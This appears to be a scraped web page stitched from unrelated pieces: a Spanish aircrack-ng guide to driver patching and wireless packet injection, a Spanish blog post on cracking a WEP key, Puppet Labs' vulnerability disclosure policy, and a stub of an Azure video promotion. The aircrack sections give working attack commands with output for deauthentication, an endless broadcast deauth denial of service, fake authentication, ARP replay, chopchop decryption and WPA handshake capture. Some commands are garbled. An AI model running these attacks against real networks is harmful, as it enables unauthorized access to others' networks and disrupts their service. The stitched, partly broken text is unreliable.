La inyección con Prism2 y Atheros es aún bastante experimental; si tu tarjeta parece colgarse (sin paquetes capturados o inyectados), desactiva la interfaz, vuelve a cargar los controladores y reinserta la tarjeta. Considera también actualizar el firmware (si es Prism2).

Todos los controladores deben ser parcheados para de ese modo soportar la inyección en modo Monitor. Necesitarás las cabeceras linux (linux headers) que coincidan con el kernel que estés usando; si no, tendrás que descargar las funentes de linux y compilar un kernel personalizado.

Si tienes problemas en lo referido a parcheado y compilación, puede que quieras usar el Troppix LiveCD, el cuál incluye controladores parcheados para los dispositivos.

  • Instalando el controlador madwifi (Tarjetas Atheros)

    Nota 1: necesitarás uudecode del paquete sharutils.

    Nota 2: el parche 20051008 debería funcionar también con versiones más recientes del CVS de madwifi.

    Nota 3: si usas wpa_supplicant, deberías recompilarlo (las verisones antiguas no son compatibles con el CVS actual de madwifi), y asegurarte de que CONFIG_DRIVER_MADWIFI=y no está comentado en config.h.

    Nota 4: con el madwifi actual, ya no será necesario ejecutar “iwpriv ath0 mode 2“, ya que el controlador permite la inyección en modo 0 usando la nueva interfaz athXraw.


    Modos Permitidos Medio Físico
    Modo 0 Automático (a/b/g)
    Modo 1 802.11a sólo
    Modo 2 802.11b sólo
    Modo 3 802.11g sólo

    ifconfig ath0 down
    rmmod wlan_wep ath_rate_sample ath_rate_onoe ..
    ath_pci wlan ath_hal 2>/dev/null

    find /lib/modules -name 'ath*' -exec rm -v {} ..; 2>/dev/null
    find /lib/modules -name 'wlan*' -exec rm -v {} ..; 2>/dev/null
    cd /usr/src
    tar -xvzf madwifi-cvs-20051025.tgz
    cd madwifi-cvs-20051025
    patch -Np1 -i ../madwifi-cvs-20051025.patch
    make KERNELPATH=/usr/src/linux-
    make install
    modprobe ath_pci

    Ahora es posible establecer el ritmo de transmisión (rate) con madwifi (y también con rt2570). El valor recomendado es 5.5 Mbps, pero puedes reducirlo o incrementarlo en función de la distancia a la que se encuentre el AP. Por ejemplo:

    iwconfig ath0 rate 24M


    Modulado Velocidades Permitidas
    DSSS / CCK 1M, 2M, 5.5M, 11M
    OFDM (a/g) 6M, 9M, 12M, 24M, 36M, 48M, 54M

    Durante los ataques 2, 3 y 4, cambiar el número de paquetes por segundo enviados por aireplay (opción -x) a veces ayuda a obtener mejores resultados; el predeterminado es 500 pps.

  • Instalación del controlador prism54 (tarjetas PrismGT FullMAC)
    ifconfig eth1 down
    rmmod prism54

    cd /usr/src
    tar -xvzf prism54-svn-20050724.tgz
    cd prism54-svn-20050724
    patch -Np1 -i ../prism54-svn-20050724.patch
    make modules && make install
    mkdir -p /usr/lib/hotplug/firmware
    mkdir -p /lib/firmware
    cp /usr/lib/hotplug/firmware/isl3890
    mv /lib/firmware/isl3890
    depmod -a
  • Instalación del controlador HostAP (tarjetas Prism2)
    ifconfig wlan0 down
    wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
    /etc/init.d/pcmcia stop
    rmmod prism2_pci
    rmmod hostap_pci

    cd /usr/src
    tar -xvzf hostap-controlador-0.4.5.tar.gz
    cd hostap-controlador-0.4.5
    patch -Np1 -i ../hostap-controlador-0.3.9.patch
    make && make install
    mv -f /etc/pcmcia/wlan-ng.conf /etc/pcmcia/wlan-ng.conf~
    /etc/init.d/pcmcia start
    modprobe hostap_pci &>/dev/null
  • Instalación del controlador wlan-ng (Prism2 cards)

    Nota importante: al insertar la tarjeta, wlan-ng flasheará el firmware en la RAM (descarga volátil) con las versiones PRI 1.1.4 y STA 1.8.3. Muchos usuarios tuvieron problemas con esta operación, por lo que en ese caso es mejor usar hostap en su lugar. Además, HostAP funciona de forma más fiable y soporta iwconfig mientras que wlan-ng no.

    ifconfig wlan0 down
    wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
    /etc/init.d/pcmcia stop
    rmmod prism2_pci
    rmmod hostap_pci
    find /lib/modules ..( -name p80211* -o -name prism2* ..) ..
    -exec rm -v {} ..;

    cd /usr/src
    tar -xvzf wlanng-0.2.1-pre26.tar.gz
    cd wlanng-0.2.1-pre26
    patch -Np1 -i ../wlanng-0.2.1-pre26.patch
    make config && make all && make install
    mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
    /etc/init.d/pcmcia start
    modprobe prism2_pci &>/dev/null
  • Instalación del controlador r8180-sa2400 (tarjetas RTL8180)
    ifconfig wlan0 down
    rmmod r8180

    cd /usr/src
    tar -xvzf rtl8180-0.21.tar.gz
    cd rtl8180-0.21
    patch -Np1 -i ../rtl8180-0.21.patch
    make && make install
    depmod -a
    modprobe r8180
  • Instalación del controlador rt2500 (Ralink b/g PCI/PCMCIA)
    ifconfig ra0 down
    rmmod rt2500

    cd /usr/src
    tar -xvzf rt2500-cvs-20051112.tgz
    cd rt2500-cvs-20051112
    cd Module
    make && make install
    modprobe rt2500

    Asegúrate de cargar el controlador con modprobe (no insmod) y de poner la tarjeta en modo Monitor antes de levantar la interfaz.

  • Instalación del controlador rt2570 (Ralink b/g USB)
    ifconfig rausb0 down
    rmmod rt2570

    cd /usr/src
    tar -xvzf rt2570-cvs-20051112.tgz
    cd rt2570-cvs-20051112
    cd Module
    make && make install
    modprobe rt2570

El controlador no compila.

Esto normalmente ocurre cuando las cabeceras no coinciden con el kernel que estás usando. En esta situación simplemente recompila un kernel nuevo, instálalo y reinicia. Luego, prueba otra vez a compilar el controlador.

Ver este HOWTO para más detalles sobre cómo compilar el kernel.

¿ Cómo uso aireplay ?

Si el controlador está correctamente parcheado, aireplay es capaz de inyectar paquetes 802.11 en modo Monitor en bruto; actualmente implementa un conjunto de 5 ataques diferentes.

Si recibes el mensaje “ioctl(SIOCGIFINDEX) failed: No such device“, revisa que el nombre de tu dispositivo es correcto y que no has olvidado un parámetro en la línea de comandos.

En los siguientes ejemplos, 00:13:10:30:24:9C es la dirección MAC del punto de acceso (en el canal 6), y 00:09:5B:EB:C5:2B es la dirección MAC de un cliente inalámbrico.

  • Ataque 0: deautenticación

    Este ataque es probablemente el más útil para recuperar un ESSID oculto (no difundido) y para capturar “saludos” WPA forzando a los clientes a reautenticarse. También puede ser usado para generar peticiones ARP en tanto que los clientes Windows a veces vacían su cache de ARP cuando son desconectados. Desde luego, este ataque es totalmente inservible si no hay clientes asociados.

    Normalmente es más efectivo fijar como blanco una estación específica usando el parámetro -c.

    Algunos ejemplos:

    • Captura del “saludo” WPA una Atheros start ath0
      airodump ath0 out 6 (cambia a otra consola)
      aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0
      (espera unos segundos)
      aircrack -w /ruta/al/diccionario out.cap
    • Generar peticiones ARP con una tarjeta Prism2 start wlan0
      airodump wlan0 out 6 (cambia a otra consola)
      aireplay -0 10 -a 00:13:10:30:24:9C wlan0
      aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

      Después de enviar tres tandas de paquetes de deautenticación, comenzamos a escuchar en busca de peticiones ARP con el ataque 3. La opción -h es esencial y debe ser la dirección MAC de un cliente asociado.

      Si el controlador es wlan-ng, debes ejecutar el script; de otro modo la tarjeta no estará preparada correctamente para la inyección.

    • Denegación de servicio masiva con una tarjeta RT2500 start ra0
      aireplay -0 0 -a 00:13:10:30:24:9C ra0

      Con el parámetro 0, este ataque enviará en un bucle infinito paquetes de deautenticación a las direcciones de broadcast, evitando así que los clientes permanezcan conectados.

  • Ataque 1: autenticación falsa

    Este ataque es particularmente útil cuando no hay clientes asociados: creamos la dirección MAC de un cliente falso, la cual quedará registrada en la tabla de asociación del AP. Esta dirección será usada para los ataques 3 (reinyección de peticiones ARP) y 4 (desencriptación WEP “chopchop”). Es mejor preparar la tarjeta con la MAC usada (abajo, 00:11:22:33:44:55) de modo que el controlador envíe ACKs de forma adecuada.

    De todos modos si este ataque falla y hay ya un cliente asociado, es más efectivo usar simplemente su dirección MAC (aquí, 00:09:5B:EB:C5:2B) para los ataques 3 y 4.

    ifconfig ath0 down
    ifconfig ath0 hw ether 00:11:22:33:44:55
    ifconfig ath0 up

    aireplay -1 0 -e "el ssid" -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
    12:14:06 Sending Authentication Request
    12:14:06 Authentication successful
    12:14:06 Sending Association Request
    12:14:07 Association successful :-)


    Con los CVS 2005-08-14 madwifi parcheados, es posible inyectar paquetes estando en modo Infraestructura (la clave WEP en sí misma no importa, en tanto que el AP acepte autenticación abierta). Por lo que, en lugar de usar el ataque 1, puedes sólo asociarte e inyectar / monitorizar a través de la interfaz athXraw:

    ifconfig ath0 down hw ether 00:11:22:33:44:55
    iwconfig ath0 mode Managed essid "el ssid" key AAAAAAAAAA
    ifconfig ath0 up

    sysctl -w dev.ath0.rawdev=1
    ifconfig ath0raw up
    airodump ath0raw out 6

    Entonces puedes ejecutar el ataque 3 o el 4 (abajo, aireplay reemplazará automáticamente ath0 por ath0raw):

    aireplay -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0
    aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0

    Algunos puntos de acceso requieren de reautenticación cada 30 segundos, si no nuestro cliente falso será considerado desconectado. En este caso utiliza el retardo de re-asociación periódica:

    aireplay -1 30 -e "el ssid" -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

    Si este ataque parece fallar (aireplay permanece enviando paquetes de petición de autenticación), puede que esté siendo usado un filtrado de direcciones MAC. Asegúrate también de que:

    • Estás lo suficientemente cerca del punto de acceso.
    • El controlador está correctamente parcheado e instalado.
    • La tarjeta está configurada en el mismo canal que el AP.
    • El BSSID y el ESSID (opciones -a / -e) son correctos.
    • Si se trata de Prism2, asegúrate de que el firmware está actualizado.

    Como recordatorio: no puedes inyectar con un chipset Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell o Broadcom debido a limitaciones de firmware y/o controlador.

  • Ataque 2: Reenvío interactivo de paquetes

    Este ataque te permite elegir un paquete dado para reenviarlo; a veces proporciona resultados más efectivos que el ataque 3 (reinyección automática de ARP).

    Podrías usarlo, por ejemplo, para intentar el ataque “redifundir cualesquiera datos”, el cuál sólo funciona si el AP realmente reencripta los paquetes de datos WEP:

    aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 ..
    -h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0

    También puedes usar el ataque 2 para reenviar manualmente paquetes de peticiones ARP encriptacas con WEP, cuyo tamaño es bien 68 o 86 bytes (dependiendo del sistema operativo):

    aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF ..
    -m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0

    aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF ..
    -m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0
  • Ataque 3: Reinyección de petición ARP

    El clásico ataque de reinyección de petición ARP es el mas efectivo para generar nuevos IVs, y funciona de forma muy eficaz. Necesitas o bien la dirección MAC de un cliente asociado (00:09:5B:EB:C5:2B), o bien la de un cliente falso del ataque 1 (00:11:22:33:44:55). Puede que tengas que esperar un par de minutos, o incluso más, hasta que aparezca una petición ARP; este ataque fallará si no hay tráfico.

    Por favor, fíjate en que también puedes reutilizar una petición ARP de una captura anterior usando el interruptor -r .

    aireplay -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
    Saving ARP requests in replay_arp-0627-121526.cap
    You must also start airodump to capture replies.
    Read 2493 packets (got 1 ARP requests), sent 1305 packets...
  • Ataque 4: El “chopchop” de KoreK (predicción de CRC)

    Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin conocer la clave. Incluso puede funcionar con WEP dinámica. Este ataque no recupera la clave WEP en sí misma, sino que revela meramente el texto plano. De cualquier modo, la mayoría de los puntos de acceso no son en absoluto vulnerables. Algunos pueden en principio parecer vulnerables pero en realidad tiran los paquetes menores de 60 bytes. Este ataque necesita al menos un paquete de datos WEP.

    1. Primero, desencriptemos un paquete:
      aireplay -4 -h 00:09:5B:EB:C5:2B ath0
    2. Echemos un vistazo a la dirección IP:
      tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
      reading from file replay_dec-0627-022301.cap, link-type [...]
      IP > icmp 64: echo request seq 1
    3. Ahora, forjemos una petición ARP.

      La IP inicial no importa (, pero la Ip de destino ( debe responder a peticiones ARP. La dirección MAC inicial debe corresponder a una estación asociada.

      ./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C ..
      00:09:5B:EB:C5:2B arp.cap
    4. Y reenviemos nuestra petición ARP forjada:
      aireplay -2 -r arp.cap ath0

Hacking Wireless : Aircrack

En este mini-tutorial explico como conectarte a una wireless que tenga encriptación WEP desde Windows o Linux. En primer lugar quiero decir que este tutorial no va destinado para robar información, ataques contra otras máquinas… Y demás actos vandálicos sino con carácter didáctico, enseñar un poco más acerca de cómo van las redes wireless. De hecho tiraré mucho de la Wikipedia para definiciones de términos más técnicos

En primer lugar quiero que vean este video:

En el video se muestra paso a paso lo que tienes que hacer para desencriptar la clave WEP de una red wireless y poder conectarte a ella. No es tan sencillo como pone el video.

Esto me recordaba a un video de The Broken que mediante un sniffer y el AirSnort descifraban claves de wireless capturando paquetes. El funcionamiento es el siguiente: el sniffer captura tráfico, dentro del tráfico capturado está la clave encriptada, y el AirSnort mediante un algoritmo matemático la desencriptaba. El problema es que había que capturar MUCHOS paquetes para poder adquirir la clave. Si la red del vecino no tenía mucho tráfico podías pasarte semanas para desencriptarla.

Las ventajas del AirCrack, el programa que utilizan en el video, son dos: la primera es que está todo integrado (sniffer, capturador de paquetes, desencriptador…) y la segunda que tiene versiones para Windows y para Linux.

Todo es muy bonito en el video y muy rápido pero las cosas no son así. Vamos a ir paso a paso viendo lo que se realiza en el video y que problemas podremos encontrar.

Antes de nada debes prepararte para poder utilizar el programa. Necesitas un Sniffer como el NetStumbler para ver las redes que tienes a tu alrededor, cuáles tienen encriptación WEP y en que canal actúan. Y en segundo lugar debes poner tu tarjeta en modo promiscuo.

En Linux es sencillo:

iwconfig [adaptador] mode monitor

Pero en Windows es más complicado. Necesitas descargarte un driver específico. En la web de AirCrack te explican de forma detallada cuáles son compatibles y cuáles no y demás. En esta lista podrás mirar que driver necesitas y dependiendo cuál sea, podrás descargarlo: Atheros o Hermes. Además necesitarás los archivos Peek.dll, Peek5.sys y Msvcr70.dll que se pueden descargar aqui y que deberás ponerlos en el mismo directorio que el aircrack.exe.

NOTA: todo esto en Linux estaría hecho con un simple comando… Esto nos indica una vez más que si queremos tener mayor control de nuestro sistema operativo… ¡¡HAY QUE MIGRAR A LINUX!!

Una vez preparado todo para poder utilizar el AirCrack comenzamos ejecutándolo y dentro de este ejecutando el airoDump para capturar paquetes. Seleccionamos la tarjeta wireless, decimos de que tipo es la interfaz: Atheros (a) o Hermes (o), seleccionamos el canal donde está la wireless que queremos hackear, lo indicó el NetStumbler; y por último indicas el nombre del archivo donde quieres guardar la información y si sólo deseas desencriptar aquellas que tienen clave WEP. ¡¡Y a capturar tráfico!!

Aqui nos puede asaltar otra duda: ¿Cuánto tráfico capturar? Hacen falta entre 500.000 a 1.000.000 paquetes IV si la WEP es de 104 bits. Los paquetes IV, vectores de inicialización, son los necesarios para la encriptación.

Una vez que hayamos alcanzado estas cifras, paramos el airoDump y ejecutamos el AirCrack, seleccionamos el archivo con las capturas del airoDump y listo!! A mí me tardó 30 segundos con 500.000 paquetes en Windows y 23 segundos con 500.000 paquetes en Ubuntu.

NOTA: tuve problemas para volver al modo normal, no promiscuo. Tuve que instalar de nuevo mi antiguo driver de la tarjeta wireless así que antes de hacer nada localícenlo!!

Cualquier duda o comentario… ¡¡A comentarlo! Un saludo.

Infrastructure Security

Infrastructure Security

This process should be followed for reporting issues with Puppet Labs infrastructure such as:

  • yum/
  • and any of our other web properties other than the Forge

While we do believe in crediting security researchers who make valuable contributions to our product security, note that we do not typically provide such credit for minor infrastructure security issues on our web properties.

Note that we do not consider the following class of issues to be report-worthy when they relate to our infrastructure:

  • Software version/Banner disclosure
  • Directory traversal on yum/apt/ where traversal is explicitly desired
  • Self-XSS/CSRF on unauthenticated web forms (including logout CSRF)
  • Disclosure/Discovery of known public files or directories(e.g., robots.txt, simple DNS enumeration)
  • Brute Force attempts (e.g., Login Page/Forgot Password without lockouts)
  • Account enumeration (e.g., enumerating Login/Reset fields for valid accounts without lockouts)

To contact the Puppet Labs Infrastructure team, please use the email address:

Product Security

This process should be followed for reporting issues with any Puppet Labs Products such as Puppet Enterprise, Puppet and MCollective, as well as the Puppet Forge. This process should also be followed for any security issues related to packages we distribute, however please follow the Infrastructure Security process for the infrastructure hosting those packages (yum/, etc.)

If you wish to contact the Puppet Labs Security Team via encrypted communication, we encourage you to use our GPG Public Key:

Puppet Labs Security Team <>
Key Long-format ID: 8728524FE21D3FC6
Key Fingerprint: 489C F9E6 BB24 2589 EFF5 BB68 8728 524F E21D 3FC6

The key is available in ASCII encoded format here. It can also be retrieved and verified from the MIT Key Server.

Puppet Labs is happy to fully disclose all details of a security vulnerability but in the interest of coordinated disclosure we do ask security researchers and other stakeholders to allow us sufficient time to patch the vulnerability before publishing the details.

We believe in crediting security researchers based on the value of the contributions provided. Our security team reviews each disclosure and assigns a scored value based on the relevance of the disclosure. These scores are calculated quarterly and the top individuals are publicly credited on our website. Additional credit will be awarded to those that provide code fixes or additional information about how to fix the disclosure.

Security Disclosures

Infrastructure as Code – Automation of Your Cloud Operations

Infrastructure as Code – Automation of Your Cloud Operations

Azure MVP Matous Rokos and Ken Kaban from PowerON discuss the power of automation and templates for Azure best practice. If you would like to learn more, visit our website:
Alternatively, please email us at:
Are you following us on social media? We post updates everyday.

[huge_it_video_player id=”1″]